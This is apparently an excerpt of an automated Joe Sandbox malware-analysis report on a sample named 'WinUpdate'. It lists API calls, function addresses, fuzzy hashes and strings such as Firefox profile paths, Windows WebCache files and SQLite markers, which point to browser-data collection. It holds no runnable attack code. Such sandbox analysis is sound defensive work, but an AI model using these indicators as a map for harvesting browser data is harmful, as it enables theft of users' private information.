                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                                                                                • String ID: $0.@
                                                                                                                                                                                                                                                                                                • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2941347001-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                                                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                                                                                                • API String ID: 3249829328-1174173950
                                                                                                                                                                                                                                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 669240632-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                                                                                • String ID: "%s"
                                                                                                                                                                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2911713577-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                                                                                • API String ID: 2705122986-2036018995
                                                                                                                                                                                                                                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                                                                                • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                                                                                • String ID: r!A
                                                                                                                                                                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                                                                                                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                                                                                APIs
